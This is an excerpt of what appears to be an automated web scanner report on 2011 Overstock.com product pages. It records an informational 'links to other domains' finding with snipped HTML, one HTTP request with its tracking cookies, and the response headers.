...[SNIP]...
<li><a href="http://www.google.com/bookmarks/mark?op=add&bkmk=[url]&title=[title]" title="Google" rel="google" target="_blank"><i class="google">
...[SNIP]...
<li><a href="http://www.myspace.com/Modules/PostTo/Pages/?u=[url]&t=[title]" title="Myspace" rel="myspace" target="_blank"><i class="myspace">
...[SNIP]...
<li><a href="https://skydrive.live.com/sharefavorite.aspx/.SharedFavorites??marklet=1&mkt=en-us&url=[url]&title=[title]" title="Live" rel="live" target="_blank"><i class="live">
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&url=[url]&amp;title=[title]" title="Digg" rel="digg" target="_blank"><i class="digg">
...[SNIP]...
<li><a href="http://del.icio.us/post?v=4&amp;noui&amp;jump=close&amp;url=[url]&title=[title]" title="Delicious" rel="delicious" target="_blank"><i class="delicious">
...[SNIP]...
<li><a href="http://reddit.com/submit?url=[url]&title=[title]" title="Reddit" rel="reddit" target="_blank"><i class="reddit">
...[SNIP]...
<li><a href="http://www.blogger.com/blog_this.pyra?u=[url]&t=[title]" title="Blogger" rel="blogger" target="_blank"><i class="blogger">
...[SNIP]...
<a class="module" href="http://www.overstock.com/club-o/19492/static.html?TID=R:RIGHTCOLA">
<img src="http://ak2.ostkcdn.com/img/mxc/20101104_clubo_e.jpg" alt="Join Club O" />
</a>
...[SNIP]...
k.com/64567/static.html?uuidCode=WJW8WYK8N5Q4T&subAgentCode=017&cboffer=001&TID=R:RIGHTCOLB','cobrandcc','scrollbars=1,toolbar=1,location=1,statusbar=1,menubar=1,resizable=1,width=1024,height=800,');"><img src="http://ak2.ostkcdn.com/img/mxc/20101117_1X1cobranding.jpg" alt="Overstock.com MasterCard Card" /></a>

<a class="module" href="http://www.overstock.com/23288/static.html?TID=R:RIGHTCOLC">
<img src="http://ak2.ostkcdn.com/img/mxc/20100826_RN_D_omail.jpg" alt="Sign Up for Omail" />
</a>
...[SNIP]...
<span class="product-image"><img src="http://ak2.ostkcdn.com/img/mxc/20100929_simmonsHEADER.jpg"></span>
...[SNIP]...
</p>


<script type="text/javascript" src="http://ak1.ostkcdn.com/js/p13n.js"></script>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Reece-Plush-Euro-top-King-size-Mattress-Set/5229605/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054601a.jpg' alt="Beautyrest Classic Reece Plush Euro-top King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Anniversary-Cypress-Hill-Plush-Pillow-top-King-size-Mattress-Set/5229650/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054641a.jpg' alt="Beautyrest Anniversary Cypress Hill Plush Pillow-top King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Anniversary-Cypress-Hill-Plush-Firm-Queen-size-Mattress-Set/5229643/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054636a.jpg' alt="Beautyrest Anniversary Cypress Hill Plush Firm Queen-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Reece-Plush-Euro-top-Queen-size-Mattress-Set/5229606/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054602a.jpg' alt="Beautyrest Classic Reece Plush Euro-top Queen-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Anniversary-Cypress-Hill-Plush-Pillow-top-Queen-size-Mattress-Set/5229651/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054642a.jpg' alt="Beautyrest Anniversary Cypress Hill Plush Pillow-top Queen-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Anniversary-Cypress-Hill-Plush-Firm-King-size-Mattress-Set/5229642/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054635a.jpg' alt="Beautyrest Anniversary Cypress Hill Plush Firm King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Reece-Plush-Euro-top-Full-size-Mattress-Set/5229602/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054599a.jpg' alt="Beautyrest Classic Reece Plush Euro-top Full-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Porter-Plush-Pillow-top-Queen-size-Mattress-Set/5229619/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054614a.jpg' alt="Beautyrest Classic Porter Plush Pillow-top Queen-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Simmons-London-Walnut-Sofa/3867928/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T11918145.jpg' alt="Simmons London Walnut Sofa" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Meyers-Plush-Firm-Queen-size-Mattress-Set/5229628/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054622a.jpg' alt="Beautyrest Classic Meyers Plush Firm Queen-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Meyers-Plush-Pillow-top-King-size-Mattress-Set/5229635/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054629a.jpg' alt="Beautyrest Classic Meyers Plush Pillow-top King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Anniversary-Cypress-Hill-Extra-Firm-Queen-size-Mattress-Set/5229640/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054633a.jpg' alt="Beautyrest Anniversary Cypress Hill Extra Firm Queen-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Simmons-London-Walnut-Loveseat/3867937/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T11918146.jpg' alt="Simmons London Walnut Loveseat" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Meyers-Plush-Firm-King-size-Mattress-Set/5229627/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054621a.jpg' alt="Beautyrest Classic Meyers Plush Firm King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Porter-Extra-Firm-Queen-size-Mattress-Set/5229610/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054606a.jpg' alt="Beautyrest Classic Porter Extra Firm Queen-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Anniversary-Cypress-Hill-Plush-Firm-California-King-size-Mattress-Set/5229641/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054634a.jpg' alt="Beautyrest Anniversary Cypress Hill Plush Firm California King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Porter-Plush-Pillow-top-King-size-Mattress-Set/5229618/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054613a.jpg' alt="Beautyrest Classic Porter Plush Pillow-top King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Anniversary-Cypress-Hill-Extra-Firm-King-size-Mattress-Set/5229639/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054632a.jpg' alt="Beautyrest Anniversary Cypress Hill Extra Firm King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Reece-Plush-Euro-top-California-King-size-Mattress-Set/5229603/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054600a.jpg' alt="Beautyrest Classic Reece Plush Euro-top California King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Anniversary-Cypress-Hill-Plush-Pillow-top-California-King-size-Mattress-Set/5229649/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054640a.jpg' alt="Beautyrest Anniversary Cypress Hill Plush Pillow-top California King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Meyers-Plush-King-size-Mattress-Set/5229631/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054625a.jpg' alt="Beautyrest Classic Meyers Plush King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Porter-Plush-Queen-size-Mattress-Set/5229614/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054610a.jpg' alt="Beautyrest Classic Porter Plush Queen-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Anniversary-Cypress-Hill-Extra-Firm-California-King-size-Mattress-Set/5229638/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054631a.jpg' alt="Beautyrest Anniversary Cypress Hill Extra Firm California King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Meyers-Extra-Firm-Queen-size-Mattress-Set/5229623/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054618a.jpg' alt="Beautyrest Classic Meyers Extra Firm Queen-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Anniversary-Cypress-Hill-Plush-Queen-size-Mattress-Set/5229647/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054639a.jpg' alt="Beautyrest Anniversary Cypress Hill Plush Queen-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Meyers-Plush-Pillow-top-Queen-size-Mattress-Set/5229636/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054630a.jpg' alt="Beautyrest Classic Meyers Plush Pillow-top Queen-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Porter-Extra-Firm-King-size-Mattress-Set/5229609/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054605a.jpg' alt="Beautyrest Classic Porter Extra Firm King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Reece-Plush-Euro-top-Twin-size-Mattress-Set/5229601/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054598a.jpg' alt="Beautyrest Classic Reece Plush Euro-top Twin-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Meyers-Plush-Firm-Full-size-Mattress-Set/5229624/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054619a.jpg' alt="Beautyrest Classic Meyers Plush Firm Full-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Anniversary-Cypress-Hill-Plush-King-size-Mattress-Set/5229646/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054638.jpg' alt="Beautyrest Anniversary Cypress Hill Plush King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Porter-Plush-King-size-Mattress-Set/5229613/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054609a.jpg' alt="Beautyrest Classic Porter Plush King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Meyers-Extra-Firm-King-size-Mattress-Set/5229622/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054617a.jpg' alt="Beautyrest Classic Meyers Extra Firm King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Meyers-Extra-Firm-Full-size-Mattress-Set/5229620/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054615a.jpg' alt="Beautyrest Classic Meyers Extra Firm Full-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Meyers-Plush-Pillow-top-California-King-size-Mattress-Set/5229634/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054628a.jpg' alt="Beautyrest Classic Meyers Plush Pillow-top California King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Meyers-Plush-Queen-size-Mattress-Set/5229632/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054626a.jpg' alt="Beautyrest Classic Meyers Plush Queen-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Porter-Plush-Pillow-top-California-King-size-Mattress-Set/5229617/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054612a.jpg' alt="Beautyrest Classic Porter Plush Pillow-top California King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Porter-Plush-Pillow-top-Full-size-Mattress-Set/5229616/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054611a.jpg' alt="Beautyrest Classic Porter Plush Pillow-top Full-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Anniversary-Cypress-Hill-Plush-California-King-size-Mattress-Set/5229644/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054637a.jpg' alt="Beautyrest Anniversary Cypress Hill Plush California King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Meyers-Plush-Full-size-Mattress-Set/5229629/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054623a.jpg' alt="Beautyrest Classic Meyers Plush Full-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Porter-Plush-Full-size-Mattress-Set/5229611/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054607a.jpg' alt="Beautyrest Classic Porter Plush Full-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Meyers-Plush-Firm-California-King-size-Mattress-Set/5229625/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054620a.jpg' alt="Beautyrest Classic Meyers Plush Firm California King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Porter-Plush-California-King-size-Mattress-Set/5229612/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054608a.jpg' alt="Beautyrest Classic Porter Plush California King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Porter-Extra-Firm-Full-size-Mattress-Set/5229607/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054603a.jpg' alt="Beautyrest Classic Porter Extra Firm Full-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Meyers-Plush-Pillow-top-Full-size-Mattress-Set/5229633/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054627a.jpg' alt="Beautyrest Classic Meyers Plush Pillow-top Full-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Meyers-Plush-California-King-size-Mattress-Set/5229630/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054624a.jpg' alt="Beautyrest Classic Meyers Plush California King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Porter-Extra-Firm-California-King-size-Mattress-Set/5229608/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054604a.jpg' alt="Beautyrest Classic Porter Extra Firm California King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Beautyrest-Classic-Meyers-Extra-Firm-California-King-size-Mattress-Set/5229621/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13054616a.jpg' alt="Beautyrest Classic Meyers Extra Firm California King-size Mattress Set" border='0'
height=120
>
</a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/lb.overstock/store1/nav;store=1;dept=32;!category=overstock;pos=btf;tile=1;sz=160x600;ord=123456789?"><img src="http://ad.doubleclick.net/ad/lb.overstock/store1/nav;store=1;dept=32;!category=overstock;pos=btf;tile=1;sz=160x600;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...
<a id="productImgLink1" rel="nofollow" href="http://www.overstock.com/Home-Garden/Decor-Swirl-Print-Dining-Chairs-Set-of-2/4401057/product.html" class="pro-thumb">
<img name="proimg1" id="proimg" border="0" height="120" width="120" alt="Decor Swirl Print Dining Chairs (Set of 2)" src="http://ak1.ostkcdn.com/images/products/T12363401a.jpg">
</a>
...[SNIP]...
<a id="productImgLink2" rel="nofollow" href="http://www.overstock.com/Home-Garden/Tovano-Arm-Chair-Creme/3267123/product.html" class="pro-thumb">
<img name="proimg2" id="proimg" border="0" height="120" width="120" alt="Tovano Arm Chair Creme" src="http://ak1.ostkcdn.com/images/products/T11372458.jpg">
</a>
...[SNIP]...
<a id="productImgLink3" rel="nofollow" href="http://www.overstock.com/Home-Garden/Tapered-Chair-Paprika/2663978/product.html" class="pro-thumb">
<img name="proimg3" id="proimg" border="0" height="120" width="120" alt="Tapered Chair Paprika" src="http://ak1.ostkcdn.com/images/products/T10862667.jpg">
</a>
...[SNIP]...
<a id="productImgLink4" rel="nofollow" href="http://www.overstock.com/Home-Garden/Kensington-Leather-Parson-Side-Chairs-Set-of-2/2216228/product.html" class="pro-thumb">
<img name="proimg4" id="proimg" border="0" height="120" width="120" alt="Kensington Leather Parson Side Chairs (Set of 2)" src="http://ak2.ostkcdn.com/images/products/T10480709b.jpg">
</a>
...[SNIP]...
<a id="productImgLink5" rel="nofollow" href="http://www.overstock.com/Home-Garden/Silver-Tabouret-Stacking-Chairs-Set-of-4/5095638/product.html" class="pro-thumb">
<img name="proimg5" id="proimg" border="0" height="120" width="120" alt="Silver Tabouret Stacking Chairs (Set of 4)" src="http://ak2.ostkcdn.com/images/products/T12950045.jpg">
</a>
...[SNIP]...
</script>


<script language="JavaScript" src="http://ak2.ostkcdn.com/js/s_code.js" type='text/javascript'></script>
...[SNIP]...
<li><a href="http://www.facebook.com/Overstockdotcom" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/overstock" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.o.biz?TID=FOOT:RS:OBIZ" target="_blank">O.biz</a>
...[SNIP]...
<li><a href="http://www.eziba.com?TID=FOOT:RS:EZIBA" target="_blank">Eziba.com</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ak2.ostkcdn.com/js/swfobject.js"></script>
<script type="text/javascript" src="http://ak2.ostkcdn.com/js/lib/os/overstock.1.5.2.min.js"></script>
...[SNIP]...
<!-- PAGE_JS_SEARCH (and NAV) -->
<script type="text/javascript" src="http://ak2.ostkcdn.com/js/search-nav.1.0.0.min.js"></script>
...[SNIP]...

5.12. http://www.overstock.com/Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html?TID=R:A2_4 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:30:02 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:30:02 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=3348501|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:02 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:02 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 137850

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
.org/ratingsv02.html" l gen true for "http://www.overstock.com/" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.overstock.com/" r (n 0 s 0 v 0 l 0))'>

<link rel="shortcut icon" href="http://ak2.ostkcdn.com/favicon.ico">
<link rel="stylesheet" href="http://ak2.ostkcdn.com/css/os-master.1.2.2.min.css">
<!--[if IE]>
...[SNIP]...
<!--End Element SITE_HEAD_S -->


<link rel="stylesheet" type="text/css" href="http://ak2.ostkcdn.com/css/product-page.1.1.1.min.css" media="all">
<script language="JavaScript1.1" type="text/javascript" src="http://ak2.ostkcdn.com/js/ProductPageCommon.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ak2.ostkcdn.com/js/swfobject.js"></script>
<script type="text/javascript" src="http://ak2.ostkcdn.com/js/lib/os/overstock.1.5.2.min.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='http://ak2.ostkcdn.com/js/sales_mtagconfig.js' type='text/javascript'> </script>


<link rel='SHORTCUT ICON' HREF='http://ak2.ostkcdn.com/favicon.ico'>


</head>
...[SNIP]...
<div class="checkOut" >
<img id="checkOutCartIcon" border="0" src="http://ak2.ostkcdn.com/img/mxc/spacer.gif">
<a id="checkoutLink" href="http://www.overstock.com/cart" rel="nofollow">
...[SNIP]...
<a href="http://www.overstock.com/cart" rel="nofollow">
<img id="checkoutButton" border="0" src="http://ak2.ostkcdn.com/img/mxc/spacer.gif" style="margin-left: 10px;">
</a>
...[SNIP]...
<a href="http://www.overstock.com/intlcountryselect"><img src="http://ak2.ostkcdn.com/img/mxc/20101020_us_flag.gif" /></a>
...[SNIP]...
</script>


<script type="text/javascript" src="http://ak2.ostkcdn.com/js/p13n.js"></script>
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=[url]&t=[title]" title="Facebook" rel="facebook" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/home?status=[url]%20-%20[title]" title="Twitter" rel="twitter" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.google.com/bookmarks/mark?op=add&bkmk=[url]&title=[title]" title="Google" rel="google" target="_blank"><i class="google">
...[SNIP]...
<li><a href="http://www.myspace.com/Modules/PostTo/Pages/?u=[url]&t=[title]" title="Myspace" rel="myspace" target="_blank"><i class="myspace">
...[SNIP]...
<li><a href="https://skydrive.live.com/sharefavorite.aspx/.SharedFavorites??marklet=1&mkt=en-us&url=[url]&title=[title]" title="Live" rel="live" target="_blank"><i class="live">
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&url=[url]&amp;title=[title]" title="Digg" rel="digg" target="_blank"><i class="digg">
...[SNIP]...
<li><a href="http://del.icio.us/post?v=4&amp;noui&amp;jump=close&amp;url=[url]&title=[title]" title="Delicious" rel="delicious" target="_blank"><i class="delicious">
...[SNIP]...
<li><a href="http://reddit.com/submit?url=[url]&title=[title]" title="Reddit" rel="reddit" target="_blank"><i class="reddit">
...[SNIP]...
<li><a href="http://www.blogger.com/blog_this.pyra?u=[url]&t=[title]" title="Blogger" rel="blogger" target="_blank"><i class="blogger">
...[SNIP]...
<div id="prodMain_imgGallery" class="col6span2">
<link rel="stylesheet" type="text/css" href="http://ak2.ostkcdn.com/css/productPageImgGallery.css"/>

<!-- ZONE - ImageGallery - BEGIN -->
...[SNIP]...
<div id="galleryImage" class="noZoom">

<img style="display: block;" onclick="return viewLarger();" id="activeImage"
src="http://ak2.ostkcdn.com/images/products/P11440034.jpg"
alt="Mira 8-way Hand-tied Paisley Arm Chair and Ottoman"


width='250'

border="0"
onLoad="CheckSize(this)"
/>


</div>
...[SNIP]...
<li class="active" id="node1">

<a onclick="return viewLarger();" onmouseover="return showPicture(this, false,false)" title="Mira 8-way Hand-tied Paisley Arm Chair and Ottoman" href="http://ak2.ostkcdn.com/images/products/P11440034.jpg">
<img height='72' name="proimg" id="image" class="sizedProdImage" src="http://ak2.ostkcdn.com/images/products/P11440034.jpg" >

</a>
...[SNIP]...
<li>
<a onclick="return viewLarger();" onmouseover="return showPicture(this, false, false)" href="http://ak1.ostkcdn.com/images/products/MLA11440034.jpg" >
<img height="72" src="http://ak2.ostkcdn.com/images/products/MLA11440034.jpg" alt="Mira 8-way Hand-tied Paisley Arm Chair and Ottoman" >
</a>
...[SNIP]...
<li>
<a onclick="return viewLarger();" onmouseover="return showPicture(this, false, false)" href="http://ak1.ostkcdn.com/images/products/MLB11440034.jpg">
<img height="72" src="http://ak1.ostkcdn.com/images/products/MLB11440034.jpg" alt="Mira 8-way Hand-tied Paisley Arm Chair and Ottoman">
</a>
...[SNIP]...
<div class="flashPlayer" id="flashcontent" >
<a href="http://www.adobe.com/go/getflashplayer" target="_blank">
<img src="http://ak2.ostkcdn.com//img/mxc/get_flash_player.gif" alt="Get Adobe Flash player" />
</a>
...[SNIP]...
</span>

<img id="starImage" alt="Overall Rating" src="http://ak2.ostkcdn.com/img/mxc/stars4_6.gif">

<a id="showAllReviewsLink" title="Read Reviews" href="http://www.overstock.com/Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/customer-reviews.html">
...[SNIP]...
<dl>
<img src='http://ak2.ostkcdn.com/img/mxc/20090714_cc+logos.gif' border='0' alt=''><h3 class="heading">
...[SNIP]...
</ul>
